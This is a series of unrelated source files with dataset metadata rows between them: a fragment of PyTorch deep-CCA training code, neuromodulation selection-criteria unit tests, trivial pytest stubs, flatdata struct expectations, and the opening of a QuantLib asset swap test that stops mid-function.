count = count + 1
del trs
tr_corr_loss = tr_corr_loss / (count)
to_append[seed_num, 0, :] = np.concatenate([[-tr_corr_loss.detach().numpy()], -neg_corrs.detach().numpy()])
data_val = data_val.to(device)
val_ops = model(data_val)
_, val_corr_loss, _,neg_corrs,_ = dmcca_model_loss(data_val, val_ops, i_shape1, o_dim, lambda_, use_all_singular_values)
data_val = data_val.cpu()
torch.cuda.empty_cache()
to_append[seed_num, 1, :] = np.concatenate([[-val_corr_loss.detach().numpy()], -neg_corrs.detach().numpy()])
data_te = data_te.to(device)
test_ops = model(data_te)
_, test_corr_loss, _,neg_corrs,_ = dmcca_model_loss(data_te, test_ops, i_shape1, o_dim, lambda_, use_all_singular_values)
data_te = data_te.cpu()
torch.cuda.empty_cache()
to_append[seed_num, 2, :] = np.concatenate([[-test_corr_loss.detach().numpy()], -neg_corrs.detach().numpy()])
models[seed_num] = model
first_and_last[seed_num] = [-tr_corr_loss, -val_corr_loss, -test_corr_loss]
print('{:0.4f} {:0.4f} {:0.4f}'.format(-tr_corr_loss, -val_corr_loss, -test_corr_loss))
nums = 1
results = np.zeros(nums)
idx = np.argsort(-first_and_last[:,1])
# print(first_and_last[idx,1:])
# print(idx)
# print(np.array(seeds)[idx])
seed = seeds[idx[0]]
print("seed: ", seed )
training_lossses = []
new_data = []
torch.manual_seed(seed)
if torch.cuda.is_available() :
torch.cuda.manual_seed_all(seed)
model = dmcca_model_n_resp_1_stim(N-1, i_shape1, i_shape2, mid_shape, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
model, training_losses = train_the_dmcca_model(model, model_optimizer, train_set, val_set, te_set, N, epoch_num, batch_size, o_dim, i_shape1, lambda_, use_all_singular_values, path_name)
model.eval()
data = [train_set, val_set, te_set]
with torch.no_grad():
new_data = []
for k in range(3):
temp = data[k].to(device)
pred_out = model(temp)
del temp
new_data.append(pred_out)
return new_data, training_losses, model
# TRAINS THE MODEL IN dmcca_model
def train_the_dmcca_model(model, model_optimizer, data_tr, data_val, data_te, N, epoch_num, batch_size, o_dim, i_shape1, lambda_, use_all_singular_values, path_name, best_only=True):
"""
ARGUMENTS:
THE DMCCA MODEL TO BE TRAINED, THE MODEL'S OPTIMIZER, THE DATA FOR TRAINING, VALIDATING AND TESTING THE MODEL; AND ALL OTHER HYPERPARAMETERS REQUIRED TO TRAIN THE MODEL.
RETURNS:
THE TRAINED MODEL AND THE LOSSES WHILE TRAINING THE MODEL.
"""
print("Started training.")
best_epoch = 0
min_loss = 0.00
loss_epochs = np.zeros((epoch_num, 3))
corr_epochs = np.zeros((epoch_num, 3, int(comb(N,2)) + 1))
mses_epochs = np.zeros((epoch_num, 3, N+1))
model.to(device)
for epoch in range(epoch_num): # loop over the dataset multiple times
model.train()
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
for trs in dataloader :
model_optimizer.zero_grad()
trs = trs.to(device)
outputs = model(trs)
loss, _, _, _, _ = dmcca_model_loss(trs, outputs, i_shape1, o_dim, lambda_, use_all_singular_values)
loss.backward()
model_optimizer.step()
del trs
model.eval()
torch.cuda.empty_cache()
tr_loss = 0 ; tr_corrs = np.zeros(int(comb(N, 2))+1) ; tr_mses = np.zeros(N+1)
count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss, corr, mse, neg_corrs, mses = dmcca_model_loss(trs, outputs, i_shape1, o_dim, lambda_, use_all_singular_values)
trs = trs.cpu()
tr_loss = tr_loss + loss
tr_corrs = tr_corrs + np.concatenate([[-corr], -neg_corrs.detach().numpy()])
tr_mses = tr_mses + np.concatenate([[mse], mses.detach().numpy()])
count = count + 1
del trs
loss_epochs[epoch, 0] = tr_loss / (count)
corr_epochs[epoch, 0, :] = tr_corrs / (count)
mses_epochs[epoch, 0, :] = tr_mses / (count)
torch.cuda.empty_cache()
print('EPOCH : {}'.format(epoch))
print(' Training corr LOSS : {:0.4f}'.format(corr_epochs[epoch, 0, 0]))
# print("{} - {} = {} {}".format(corr_epochs[epoch, 0, 0], mses_epochs[epoch, 0, 0], -loss_epochs[epoch,0], corr_epochs[epoch, 0, 1:]))
print("{} - {} = {}".format(corr_epochs[epoch, 0, 0], mses_epochs[epoch, 0, 0], -loss_epochs[epoch,0]))
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss, corr, mse, neg_corrs, mses = dmcca_model_loss(data_val, val_ops, i_shape1, o_dim, lambda_, use_all_singular_values)
loss_epochs[epoch, 1] = val_loss
corr_epochs[epoch, 1, :] = np.concatenate([[-corr], -neg_corrs.detach().numpy()])
mses_epochs[epoch, 1, :] = np.concatenate([[mse], mses.detach().numpy()])
data_val = data_val.cpu()
torch.cuda.empty_cache()
print(' Validation corr LOSS : {:0.4f}'.format(-corr))
# print("{} - {} = {} {}".format(-corr, mse, -val_loss, -neg_corrs))
print("{} - {} = {}".format(-corr, mse, -val_loss))
data_te = data_te.to(device)
print(data_te.shape)
test_ops = model(data_te)
test_loss, corr, mse, neg_corrs, mses = dmcca_model_loss(data_te, test_ops, i_shape1, o_dim, lambda_, use_all_singular_values)
loss_epochs[epoch, 2] = test_loss
corr_epochs[epoch, 2, :] = np.concatenate([[-corr], -neg_corrs.detach().numpy()])
mses_epochs[epoch, 2, :] = np.concatenate([[mse], mses.detach().numpy()])
data_te = data_te.cpu()
torch.cuda.empty_cache()
print(' Test corr LOSS : {:0.4f}'.format(-corr))
# print("{} - {} = {} {}".format(-corr, mse, -test_loss, -neg_corrs))
print("{} - {} = {}".format(-corr, mse, -test_loss))
print(" val. loss is : {:0.4f} & the min. loss is : {:0.4f}".format(val_loss, min_loss))
print(" AND since, val_loss < min_loss is {}".format(val_loss < min_loss))
model_file_name = path_name + 'best_model.pth'
if best_only == True:
if val_loss < min_loss or epoch == 0:
torch.save({
'epoch' : epoch,
'model_state_dict' : model.state_dict(),
'optimizer_state_dict': model_optimizer.state_dict(),
'loss': loss}, model_file_name)
print(' Saved the model at epoch : {}\n'.format(epoch))
min_loss = val_loss
else:
if epoch != 0:
checkpoint = torch.load(model_file_name)
model.load_state_dict(checkpoint['model_state_dict'])
model_optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
best_epoch = checkpoint['epoch']
# loss = checkpoint['loss']
print(' Loaded the model from epoch : {}.\n'.format(best_epoch))
model.train()
return model, [loss_epochs, corr_epochs, mses_epochs]
# DCCA MODELS WITH DIFFERENT ARCHITECTURES
# 13_2, 13_3, 15_4, 13_5, 100_2, 100_3, 100_4, 100_5, 10000_2, 10000_3, 10000_4,
def generic_dcca3(stim_data, resp_data, type, o_dim, learning_rate=1e-3, use_all_singular_values=False, epoch_num=12, batch_size=2048, reg_par=1e-4, dropout=0.05, path_name="", seeds=np.ceil(np.random.rand(10)*100)):
"""
CAN BE USED TO ACCESS DIFFERENT DCCA MODELS FROM THE deep_nets.py.
THESE ARE THE MODELS EXPLORED AND REPORTED IN THE PAPER.
OTHER THAN SETTING THE DCCA MODEL, EVERYTHING ELSE IS SAME AS THE "dcca_model".
"""
stimtr = stim_data[0]
stimval = stim_data[1]
stimte = stim_data[2]
resptr = resp_data[0]
respval = resp_data[1]
respte = resp_data[2]
stimtr, mean1, std1 = my_standardize(stimtr)
resptr, mean2, std2 = my_standardize(resptr)
stimval = (stimval - mean1) / std1
stimte = (stimte - mean1) / std1
respval = (respval - mean2) / std2
respte = (respte - mean2) / std2
resp_tr = torch.from_numpy(resptr ).float()
resp_val = torch.from_numpy(respval).float()
resp_te = torch.from_numpy(respte ).float()
stim_tr = torch.from_numpy(stimtr ).float();
stim_val = torch.from_numpy(stimval).float();
stim_te = torch.from_numpy(stimte ).float();
data_tr = torch.cat([resp_tr, stim_tr ], 1)
data_val = torch.cat([resp_val, stim_val], 1)
data_te = torch.cat([resp_te, stim_te ], 1)
i_shape1 = resp_tr.shape[1]
i_shape2 = stim_tr.shape[1]
best_only = True
act = "sigmoid"
o_act = 'leaky_relu'
if (isinstance(seeds, int)):
seed = seeds
elif not(isinstance(seeds, int)) and len(seeds) == 1:
seed = seeds[0]
else:
torch.backends.cudnn.deterministic = True
first_and_last = np.zeros((len(seeds),3))
models = [None] * len(seeds)
print('seeds: ', seeds)
for seed_num, seed in enumerate(seeds) :
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = None
if type == "13_2": model = model2_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "13_3": model = model3_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "15_4": model = model2_15(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "13_5": model = model5_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_2": model = model_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_3": model = model_3_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_4": model = model_4_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_5": model = model_5_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "10000_2": model = model_10000s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
print('MODEL : {}'.format(seed_num))
model.eval()
torch.cuda.empty_cache()
tr_loss = 0 ; count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
tr_loss = tr_loss + loss
count = count + 1
del trs
tr_loss = tr_loss / count
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss = cca_loss(val_ops, o_dim, use_all_singular_values)
data_val = data_val.cpu()
torch.cuda.empty_cache()
data_te = data_te.to(device)
test_ops = model(data_te)
test_loss = cca_loss(test_ops, o_dim, use_all_singular_values)
data_te = data_te.cpu()
torch.cuda.empty_cache()
models[seed_num] = model
first_and_last[seed_num] = [-tr_loss, -val_loss, -test_loss]
print('{:0.4f} {:0.4f} {:0.4f}'.format(-tr_loss, -val_loss, -test_loss))
np.set_printoptions(precision=4)
idx = np.argsort(-first_and_last[:,1])
print(first_and_last[idx,1:])
print(seeds[idx])
seed = seeds[idx[0]]
print("seed: ", seed )
torch.manual_seed(seed)
if torch.cuda.is_available() : torch.cuda.manual_seed_all(seed)
model = None
if type == "13_2": model = model2_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "13_3": model = model3_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "15_4": model = model2_15(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "13_5": model = model5_13(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_2": model = model_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_3": model = model_3_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_4": model = model_4_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "100_5": model = model_5_100s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
if type == "10000_2": model = model_10000s(i_shape1, i_shape2, act, o_act, o_dim, dropout)
model = model.to(device)
model_optimizer = optim.Adam(model.parameters(), lr=learning_rate, weight_decay=reg_par)
model_state_dict = []
min_loss = 0.00 ; min_loss2 = 0.00
correlations = np.zeros((epoch_num, 3))
for epoch in range(epoch_num): # loop over the dataset multiple times
model.train()
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
for trs in dataloader :
model_optimizer.zero_grad()
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
loss.backward()
model_optimizer.step()
del trs
model.eval()
torch.cuda.empty_cache()
tr_loss = 0
count = 0
dataloader = DataLoader(data_tr, batch_size, shuffle=True)
with torch.no_grad():
for trs in dataloader :
trs = trs.to(device)
outputs = model(trs)
loss = cca_loss(outputs, o_dim, use_all_singular_values)
loss = loss.item()
tr_loss = tr_loss + loss
count = count + 1
del trs
correlations[epoch, 0] = -tr_loss / (count)
torch.cuda.empty_cache()
print('EPOCH : {}'.format(epoch))
print(' Training CORRELATION : {:0.4f}'.format(correlations[epoch, 0]))
data_val = data_val.to(device)
val_ops = model(data_val)
val_loss = cca_loss(val_ops, o_dim, use_all_singular_values)
correlations[epoch, 1] = -val_loss
data_val = data_val.cpu()
torch.cuda.empty_cache()
print(' Validation CORRELATION : {:0.4f}'.format(-val_loss))
data_te = data_te.to(device)
test_ops = model(data_te)
test_loss = cca_loss(test_ops, o_dim, use_all_singular_values)
correlations[epoch, 2] = -test_loss
data_te = data_te.cpu()
torch.cuda.empty_cache()
print(' Test CORRELATION : {:0.4f}'.format(-test_loss))
print(" val. loss is : {:0.4f} & the min. loss is : {:0.4f}".format(val_loss, min_loss))
print(" AND since, val_loss < min_loss is {}".format(val_loss < min_loss))
if val_loss < min_loss2:
min_loss2 = val_loss
model_file_name = path_name + '/best_model.pth'
if best_only == True:
if val_loss < min_loss or epoch == 0:
torch.save({
'epoch' : epoch,
'model_state_dict' : model.state_dict(),
'optimizer_state_dict': model_optimizer.state_dict(),
'loss': loss}, model_file_name)
print(' Saved the model at epoch : {}\n'.format(epoch))
min_loss = val_loss
else:
if epoch != 0:
checkpoint = torch.load(model_file_name)
model.load_state_dict(checkpoint['model_state_dict'])
model_optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
best_epoch = checkpoint['epoch']
# loss = checkpoint['loss']
print(' Loaded the model from epoch : {}.\n'.format(best_epoch))
model.train()
model.eval()
data2 = [data_tr, data_val, data_te]
with torch.no_grad():
new_data = []
for k in range(3):
temp = data2[k].to(device)
pred_out = model(temp)
new_data.append([pred_out[0].cpu().numpy(), pred_out[1].cpu().numpy()])
# x1 = new_data[2][0]
# x2 = new_data[2][1]
# result = np.squeeze(my_corr(x1, x2, o_dim))
# print(result)
return new_data, correlations, model
| 42.141304 | 239 | 0.595531 | 4,220 | 31,016 | 4.121564 | 0.074645 | 0.011499 | 0.022538 | 0.032197 | 0.860576 | 0.848387 | 0.826597 | 0.802047 | 0.794228 | 0.772897 | 0 | 0.027349 | 0.289141 | 31,016 | 735 | 240 | 42.198639 | 0.76152 | 0.14873 | 0 | 0.821293 | 0 | 0.005703 | 0.057174 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007605 | false | 0 | 0.032319 | 0 | 0.047529 | 0.095057 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
defa5ba8c7b7d2953ce455770a6e1c357bd3069e | 4,983 | py | Python | tests/test_selection_criteria.py | jofrony/Neuromodulation | b5e1502701399c02cecff20b85d4ff8af7772ec9 | [
"MIT"
] | 2 | 2021-12-21T11:10:45.000Z | 2021-12-21T11:11:04.000Z | tests/test_selection_criteria.py | jofrony/Neuromodcell | b5e1502701399c02cecff20b85d4ff8af7772ec9 | [
"MIT"
] | 1 | 2021-03-27T23:15:29.000Z | 2021-03-27T23:20:23.000Z | tests/test_selection_criteria.py | jofrony/Neuromodcell | b5e1502701399c02cecff20b85d4ff8af7772ec9 | [
"MIT"
] | 1 | 2021-03-27T23:13:48.000Z | 2021-03-27T23:13:48.000Z | import neuromodcell.selection_criteria as sc
import numpy as np

def test_number_AP_decrease():
    voltage_control = np.array([-100, -100, 100, -100, -100, -100])
    voltage = np.array([-100, -100, -100, -100, -100, -100])
    criteria = {"selection": {"mean": 1, "std": 1, "threshold": 1}, "parameters": {'dt': 0.1}}
    result = sc.number_AP_decrease(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True
    assert zscore == 0

def test_number_AP_increase():
    voltage_control = np.array([-100, -100, -100, -100, -100, -100])
    voltage = np.array([-100, -100, 100, -100, -100, -100])
    criteria = {"selection": {"mean": 1, "std": 1, "threshold": 1}, "parameters": {'dt': 0.1}}
    result = sc.number_AP_increase(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True
    assert zscore == 0

def test_frequency_change():
    voltage_control = np.array([-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100])
    voltage = np.array([-100, 100, -100, 100, -100, 100, -100, 100, -100, 100, -100])
    criteria = {"selection": {"mean": 5, "std": 1, "threshold": 1},
                "parameters": {"tstart": 0, "tstop": 1000, 'dt': 100}}
    result = sc.frequency_change(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True
    assert zscore == 0

def test_frequency_increase():
    voltage_control = np.array([-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100])
    voltage = np.array([-100, 100, -100, 100, -100, 100, -100, 100, -100, 100, -100])
    criteria = {"selection": {"mean": 5, "std": 1, "threshold": 1},
                "parameters": {"tstart": 0, "tstop": 1000, 'dt': 100}}
    result = sc.frequency_change_increase(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True
    assert zscore == 0

def test_frequency_decrease():
    voltage_control = np.array([-100, 100, -100, 100, -100, 100, -100, 100, -100, 100, -100])
    voltage = np.array([-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100])
    criteria = {"selection": {"mean": 5, "std": 1, "threshold": 1},
                "parameters": {"tstart": 0, "tstop": 1000, 'dt': 100}}
    result = sc.frequency_change_decrease(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True
    assert zscore == 0

def test_cv_change():
    voltage_control = np.array([-100, 100, -100, 100, -100, 100, -100, 100, -100, 100, -100])
    voltage = np.array([-100, -100, -100, 100, -100, -100, -100, 100, -100, 100, -100])
    criteria = {"selection": {"mean": 0.333, "std": 1, "threshold": 1}, "parameters": {'dt': 100}}
    result = sc.cv_change(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True

def test_membrane_amplitude_increase():
    voltage_control = np.array([-100, -100, -100, -100, -90, -90, -90, -90, -100, -100, -100, -100])
    voltage = np.array([-100, -100, -100, -100, -80, -80, -80, -80, -100, -100, -100, -100])
    criteria = {"selection": {"mean": 10, "std": 1, "threshold": 1},
                "parameters": {'start_base': 0, 'stop_base': 0.2,
                               'start_measure': 0.4, 'stop_measure': 0.8, 'dt': 0.1}}
    result = sc.membrane_amplitude_increase(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True
    assert zscore == 0

def test_membrane_amplitude_increase_percentage():
    voltage_control = np.array([-100, -100, -100, -100, -90, -90, -90, -90, -100, -100, -100, -100])
    voltage = np.array([-100, -100, -100, -100, -80, -80, -80, -80, -100, -100, -100, -100])
    criteria = {"selection": {"mean": 200, "std": 1, "threshold": 1},
                "parameters": {'start_base': 0, 'stop_base': 0.2,
                               'start_measure': 0.4, 'stop_measure': 0.8, 'dt': 0.1}}
    result = sc.membrane_amplitude_increase_percentage(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True
    assert zscore == 0

def test_membrane_amplitude_decrease_percentage():
    voltage_control = np.array([-100, -100, -100, -100, -80, -80, -80, -80, -100, -100, -100, -100])
    voltage = np.array([-100, -100, -100, -100, -90, -90, -90, -90, -100, -100, -100, -100])
    criteria = {"selection": {"mean": 50, "std": 1, "threshold": 1},
                "parameters": {'start_base': 0, 'stop_base': 0.2,
                               'start_measure': 0.4, 'stop_measure': 0.8, 'dt': 0.1}}
    result = sc.membrane_amplitude_decrease_percentage(criteria, [voltage_control, voltage])
    boolean = result['boolean']
    zscore = result['zscore']
    assert boolean == True
    assert zscore == 0
| 34.846154 | 120 | 0.601244 | 648 | 4,983 | 4.509259 | 0.08179 | 0.279261 | 0.344969 | 0.361396 | 0.959274 | 0.948323 | 0.939425 | 0.932238 | 0.932238 | 0.917864 | 0 | 0.157315 | 0.198876 | 4,983 | 142 | 121 | 35.091549 | 0.574649 | 0 | 0 | 0.636364 | 0 | 0 | 0.12342 | 0 | 0 | 0 | 0 | 0 | 0.193182 | 1 | 0.102273 | false | 0 | 0.022727 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
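All of the selection functions exercised in `test_selection_criteria.py` share one contract: take a `criteria` dict with a `(mean, std, threshold)` selection rule, take a `[control, modulated]` pair of voltage traces, and return `{'boolean': ..., 'zscore': ...}`. The pattern can be illustrated with a small standalone sketch — the helper names below are hypothetical, not the actual `neuromodcell.selection_criteria` implementation:

```python
import numpy as np

def count_spikes(voltage, threshold=0.0):
    # Count upward threshold crossings in a voltage trace.
    v = np.asarray(voltage)
    return int(np.sum((v[:-1] < threshold) & (v[1:] >= threshold)))

def spike_increase_criterion(criteria, voltages):
    # Same shape of contract as the functions under test: compare the
    # change in spike count against the (mean, std, threshold) rule and
    # return a dict with 'boolean' and 'zscore'.
    control, modulated = voltages
    change = count_spikes(modulated) - count_spikes(control)
    sel = criteria["selection"]
    zscore = (change - sel["mean"]) / sel["std"]
    return {"boolean": abs(zscore) <= sel["threshold"], "zscore": zscore}

result = spike_increase_criterion(
    {"selection": {"mean": 1, "std": 1, "threshold": 1}},
    [[-100, -100, -100, -100], [-100, 100, -100, -100]])
# One extra spike in the modulated trace, mean 1 -> zscore 0, boolean True
```

A z-score of 0 means the measured change matches the target mean exactly, which is why the tests above all assert `zscore == 0` for their hand-built traces.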
a0e8ac09bbc8bf9740d2eeb7260d972e1f3973bb | 99 | py | Python | tmp/test_c.py | wiki918/python_pytest_demo | 32180f726cabbd7685dda04e72aa111b00677930 | [
"BSD-3-Clause"
] | null | null | null | tmp/test_c.py | wiki918/python_pytest_demo | 32180f726cabbd7685dda04e72aa111b00677930 | [
"BSD-3-Clause"
] | null | null | null | tmp/test_c.py | wiki918/python_pytest_demo | 32180f726cabbd7685dda04e72aa111b00677930 | [
"BSD-3-Clause"
] | null | null | null | def test_c_1():
assert True
def test_c_2():
assert True
def test_c_3():
assert True
| 9.9 | 15 | 0.636364 | 18 | 99 | 3.166667 | 0.444444 | 0.368421 | 0.421053 | 0.596491 | 0.631579 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 0.272727 | 99 | 9 | 16 | 11 | 0.75 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a0f26b7bc6eb071bde286a7a88407f38a19ed08c | 659 | py | Python | flatdata-generator/tests/generators/py_expectations/structs/namespaces.py | gferon/flatdata | 8839fb36be105e496fea8acc3fc907ae878dd063 | [
"Apache-2.0"
] | null | null | null | flatdata-generator/tests/generators/py_expectations/structs/namespaces.py | gferon/flatdata | 8839fb36be105e496fea8acc3fc907ae878dd063 | [
"Apache-2.0"
] | null | null | null | flatdata-generator/tests/generators/py_expectations/structs/namespaces.py | gferon/flatdata | 8839fb36be105e496fea8acc3fc907ae878dd063 | [
"Apache-2.0"
] | 1 | 2021-07-16T07:51:16.000Z | 2021-07-16T07:51:16.000Z | class n_Foo(flatdata.structure.Structure):
""""""
_SCHEMA = """namespace n {
struct Foo
{
f : u32 : 32;
}
}
"""
_SIZE_IN_BITS = 32
_SIZE_IN_BYTES = 4
_FIELDS = {
"f": flatdata.structure.FieldSignature(offset=0, width=32, is_signed=False, dtype="u4"),
}
_FIELD_KEYS = {
"f",
}
class m_Foo(flatdata.structure.Structure):
""""""
_SCHEMA = """namespace m {
struct Foo
{
f : u32 : 32;
}
}
"""
_SIZE_IN_BITS = 32
_SIZE_IN_BYTES = 4
_FIELDS = {
"f": flatdata.structure.FieldSignature(offset=0, width=32, is_signed=False, dtype="u4"),
}
_FIELD_KEYS = {
"f",
}
| 17.342105 | 96 | 0.558422 | 78 | 659 | 4.410256 | 0.371795 | 0.197674 | 0.093023 | 0.168605 | 0.959302 | 0.959302 | 0.703488 | 0.703488 | 0.703488 | 0.703488 | 0 | 0.046414 | 0.280728 | 659 | 37 | 97 | 17.810811 | 0.679325 | 0 | 0 | 0.5625 | 0 | 0 | 0.166924 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
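Each `_FIELDS` entry above is a `FieldSignature(offset, width, is_signed, dtype)` describing where a member lives inside the packed structure — here a single unsigned 32-bit field at bit offset 0, which is why `_SIZE_IN_BITS = 32` and `_SIZE_IN_BYTES = 4`. The bit-level decode such a signature implies can be sketched in plain Python (an illustration of the idea, assuming little-endian packing; this is not flatdata's actual reader):

```python
def read_field(buf, offset_bits, width_bits, is_signed=False):
    # Extract `width_bits` starting at `offset_bits` from a little-endian
    # byte buffer, mirroring a FieldSignature(offset, width, is_signed).
    value = int.from_bytes(buf, "little")
    mask = (1 << width_bits) - 1
    raw = (value >> offset_bits) & mask
    if is_signed and raw >> (width_bits - 1):
        raw -= 1 << width_bits  # sign-extend negative values
    return raw

# A 4-byte Foo with f = 32 stored as an unsigned 32-bit field at offset 0.
buf = (32).to_bytes(4, "little")
print(read_field(buf, offset_bits=0, width_bits=32))  # 32
```

Because fields are addressed in bits rather than bytes, the same helper handles sub-byte fields and fields that straddle byte boundaries without special cases.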
9d0c51224de13c525b0522e8364009d1ee6fa542 | 189,319 | py | Python | QuantLib-SWIG/Python/test/assetswap.py | txu2014/quantlib | 95c7d94906c30d0c3c4e0758a2ebfe2a62b075ec | [
"BSD-3-Clause"
] | 1 | 2021-08-17T14:59:58.000Z | 2021-08-17T14:59:58.000Z | QuantLib-SWIG/Python/test/assetswap.py | txu2014/quantlib | 95c7d94906c30d0c3c4e0758a2ebfe2a62b075ec | [
"BSD-3-Clause"
] | 1 | 2019-02-20T05:37:59.000Z | 2019-02-20T05:37:59.000Z | QuantLib-SWIG/Python/test/assetswap.py | txu2014/quantlib | 95c7d94906c30d0c3c4e0758a2ebfe2a62b075ec | [
"BSD-3-Clause"
] | 1 | 2020-01-14T11:55:16.000Z | 2020-01-14T11:55:16.000Z | """
Copyright (C) 2011 Lluis Pujol Bajador
This file is part of QuantLib, a free-software/open-source library
for financial quantitative analysts and developers - http://quantlib.org/
QuantLib is free software: you can redistribute it and/or modify it
under the terms of the QuantLib license. You should have received a
copy of the license along with this program; if not, please email
<quantlib-dev@lists.sf.net>. The license is also available online at
<http://quantlib.org/license.shtml>.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the license for more details.
"""
from QuantLib import *
import unittest
class AssetSwapTest(unittest.TestCase):
    def setUp(self):
        # initial setup
        self.termStructure = RelinkableYieldTermStructureHandle()
        self.swapSettlementDays = 2
        self.faceAmount = 100.0
        self.fixedConvention = Unadjusted
        self.compounding = Continuous
        self.fixedFrequency = Annual
        self.floatingFrequency = Semiannual
        self.iborIndex = Euribor(Period(self.floatingFrequency), self.termStructure)
        self.calendar = self.iborIndex.fixingCalendar()
        self.swapIndex = SwapIndex("EuriborSwapIsdaFixA", Period(10, Years),
                                   self.swapSettlementDays,
                                   self.iborIndex.currency(), self.calendar,
                                   Period(self.fixedFrequency), self.fixedConvention,
                                   self.iborIndex.dayCounter(), self.iborIndex)
        self.spread = 0.0
        self.nonnullspread = 0.003
        self.today = Date(24, April, 2007)
        Settings.instance().evaluationDate = self.today
        self.termStructure.linkTo(FlatForward(self.today, 0.05, Actual365Fixed()))
        self.yieldCurve = FlatForward(self.today, 0.05, Actual365Fixed())
        self.pricer = BlackIborCouponPricer()
        self.swaptionVolatilityStructure = SwaptionVolatilityStructureHandle(
            ConstantSwaptionVolatility(self.today, NullCalendar(), Following,
                                       0.2, Actual365Fixed()))
        self.meanReversionQuote = QuoteHandle(SimpleQuote(0.01))
        self.cmspricer = AnalyticHaganPricer(self.swaptionVolatilityStructure,
                                             GFunctionFactory.Standard,
                                             self.meanReversionQuote)

    def testConsistency(self):
        """Testing consistency between fair price and fair spread..."""
        bondCalendar = TARGET()
        settlementDays = 3

        ## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
        ## maturity doesn't occur on a business day
        bondSchedule = Schedule(Date(4, January, 2005),
                                Date(4, January, 2037),
                                Period(Annual), bondCalendar,
                                Unadjusted, Unadjusted,
                                DateGeneration.Backward, False)
        bond = FixedRateBond(settlementDays, self.faceAmount,
                             bondSchedule, [0.04],
                             ActualActual(ActualActual.ISDA),
                             Following,
                             100.0, Date(4, January, 2005))
        payFixedRate = True
        bondPrice = 95.0
        isPar = True

